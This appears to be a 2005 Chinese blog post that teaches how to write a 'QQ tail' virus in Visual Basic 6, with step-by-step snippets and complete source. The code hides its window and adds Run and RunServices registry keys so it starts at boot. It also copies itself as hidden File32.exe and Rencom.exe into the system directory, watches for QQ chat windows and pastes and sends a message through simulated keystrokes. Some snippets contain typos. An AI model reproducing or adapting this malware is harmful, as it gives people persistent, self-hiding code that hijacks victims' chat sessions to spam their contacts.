初学API,Sunday的一个QQ尾巴病毒

原创 于 2005-08-11 20:18:00 发布 · 1.1k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#api #qq #string #function #timer #user

本文介绍了用VB结合常用API编写QQ尾巴病毒程序的方法。该病毒运行时会隐藏自身、开机自启、复制到系统目录,还会监视QQ聊天窗口,发现后模拟键盘复制信息并发送。文中详细列出了用到的API及各步骤代码。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Sunday的一个QQ尾巴病毒

运行它时
1.它会使自身在桌面和任务栏上隐藏;
2.在注册表的RUN项建一个子键使之能开机自动运行;
3.复制自己到系统目录下,并隐藏;
4.监视桌面前台窗口,并捕捉QQ聊天窗口;
5.当发现QQ窗口时就立刻模拟键盘将一条信息复制上去并发送.
   就这么简单!它没有用到HOOK钩子截取系统消息,想了想,哈,俺用VB也能写一个,不就是几个常用的API
嘛.反正无聊,开工.......
  
首先介绍一下要用到的API吧
1.GetWindow           取得所属窗口句柄;
2.ShowWindow          窗口设置;
3.GetSystemDirectory  取得系统目录路径;
4.RegCreateKey        打开注册表的项;
5.RegSetValueEx       新建子键;
6.RegCloseKey         关闭注册表;
7.GetForegroundWindow 取得前台窗口句柄;
8.GetWindowText       取得前台窗口的标题;
9.Keybd_event         模拟键盘事件.

第一步:隐藏!!
API声明:  GetWindow    ShowWindow
常数:     GW_OWNER     SW_HIDE
dim a as long
a=GetWindow(me.hwnd , GW_OWNER)
ShowWindow a , SW_HIDE
me.visible=false

第二步:取得系统目录路径!
API声明:  GetSystemDirectory
dim b as string
b=space(19)
GetSystemDirectory b , 20

第三步:修改注册表!
API声明: RegCreateKey  RegSetValueEx  RegCloseKey
常数:    HKEY_LOCAL_MACHINE,REG_SZ
dim c as string
dim d as string
dim e as long
c="SOFTWARE/Microsoft/Windows/CurrentVersion/Run"
d=b & "/file32.exe"
RegCreateKey HKEY_LOCAL_MACHINE , c , e
RegSetValueEx e , "file32" , 0 , REG_SZ , byval d , len(d)
RegCloseKey e

第四步:复制自己到系统目录下,并隐藏!
dim f as string
f=app.path & "/" & app.exename & ".exe"
filecopy f , d
setarrt d , vbhiden

第五步:监视前台窗口!
API声明: GetForegroundWindow    GetWindowText
dim g as long
dim h as string
h=space(256)
g=GetForegroundWindow()
GetWindowText g , h , 255
'判断前台窗口是否QQ窗口,如果是就进入第六步,如果不是则继续监视
'这处代码应放在TIMER中!
if left(h,1)="与" then
call stup six(第六步)
end if

第六步:设定剪切板内容,并模拟键盘(CTRL+V)粘贴,(ENTER OR ENTER+CTRL)发送!
API声明: Keybd_event
常数: vk_control(&h11)   vk_v(86)    keyeventf_keyup(&h2) 
clipboard.clear
clipboard.settext "恭喜你,高中了QQ尾巴病毒!"
keybd_ecent vk_control,0,0,0
keybd_event 86,0,0,0
keybd_ecent 86,0,keyeventf_keyup,0
keybd_event vk_control,0,keyeventf_keyup,0
keybd_ecent 13,0,0,0
keybd_ecent 13,0,keyeventf_keyup,0
keybd_event vk_control,0,0,0
keybd_ecent 13,0,0,0
keybd_event 13,0,keyeventf_keyup,0
keybd_event vk_control,0,keyeventf_keyup,0
clipboard.clear

完整代码如下:
Private Declare Function GetWindow Lib "user32" (ByVal hwnd As Long, ByVal wCmd As Long) As Long
Private Declare Function ShowWindow Lib "user32" (ByVal hwnd As Long, ByVal nCmdShow As Long) As Long
Private Const GW_OWNER = 4
Private Const SW_HIDE = 0
Private Declare Function GetSystemDirectory Lib "kernel32" Alias "GetSystemDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Private Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Private Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long         ' Note that if you declare the lpData parameter as String, you must pass it By Value.
Private Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long
Private Const HKEY_LOCAL_MACHINE = &H80000002
Private Const REG_SZ = 1
Private Declare Function GetForegroundWindow Lib "user32" () As Long
Private Declare Function GetWindowText Lib "user32" Alias "GetWindowTextA" (ByVal hwnd As Long, ByVal lpString As String, ByVal cch As Long) As Long
Private Declare Sub keybd_event Lib "user32" (ByVal bVk As Byte, ByVal bScan As Byte, ByVal dwFlags As Long, ByVal dwExtraInfo As Long)
Private Const KEYEVENTF_KEYUP = &H2
Dim j As String
Dim k As String
Dim ii As Integer
Dim e, f As String

Private Sub Form_Load()
Dim a As Long
Dim b As String
Dim c, d As String
Dim e1 As String
Dim e2 As String
Dim f1, f2 As Long
Me.Visible = False
a = GetWindow(Me.hwnd, GW_OWNER)
ShowWindow a, SW_HIDE
b = Space(19)
GetSystemDirectory b, 20
c = "SOFTWARE/Microsoft/Windows/CurrentVersion/Run"
d = "SOFTWARE/Microsoft/Windows/CurrentVersion/RunServices"
e1 = b & "/File32.exe"
e2 = Left(b, 11) & "Rencom.exe"
RegCreateKey HKEY_LOCAL_MACHINE, c, f1
RegSetValueEx f1, "File32", 0, REG_SZ, ByVal e1, Len(e1)
RegCloseKey f1
RegCreateKey HKEY_LOCAL_MACHINE, d, f2
RegSetValueEx f2, "Rencom", 0, REG_SZ, ByVal e2, Len(e2)
RegCloseKey f2
On Error Resume Next
Dim g As String
g = App.Path & "/" & App.EXEName & ".exe"
FileCopy g, e1
SetAttr e1, vbHidden
FileCopy g, e2
SetAttr e2, vbHidden
e = e1
f = e2
End Sub

Private Sub Timer1_Timer()
ii = ii + 1
If ii = 1111 Then ii = 1
Dim h As Long
Dim i As String
h = GetForegroundWindow()
i = Space(256)
GetWindowText h, i, 255
If Left(i, 1) = "与" And ii Mod 20 = 8 Then
j = Space(256)
j = i
Call mer
End If
End Sub
 Sub mer()
If k <> j Then
Clipboard.Clear
Clipboard.SetText "恭喜你,高中了QQ尾巴病毒!"
keybd_event &H11, 0, 0, 0
keybd_event 86, 0, 0, 0
keybd_event 86, 0, KEYEVENTF_KEYUP, 0
keybd_event &H11, 0, KEYEVENTF_KEYUP, 0
keybd_event 13, 0, 0, 0
keybd_event 13, 0, KEYEVENTF_KEYUP, 0
keybd_event &H11, 0, 0, 0
keybd_event 13, 0, 0, 0
keybd_event 13, 0, KEYEVENTF_KEYUP, 0
keybd_event &H11, 0, KEYEVENTF_KEYUP, 0
k = Space(256)
k = j
End If
End Sub


  ---------Sunday#
  -----------2005.8.10

lisnake
关注
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值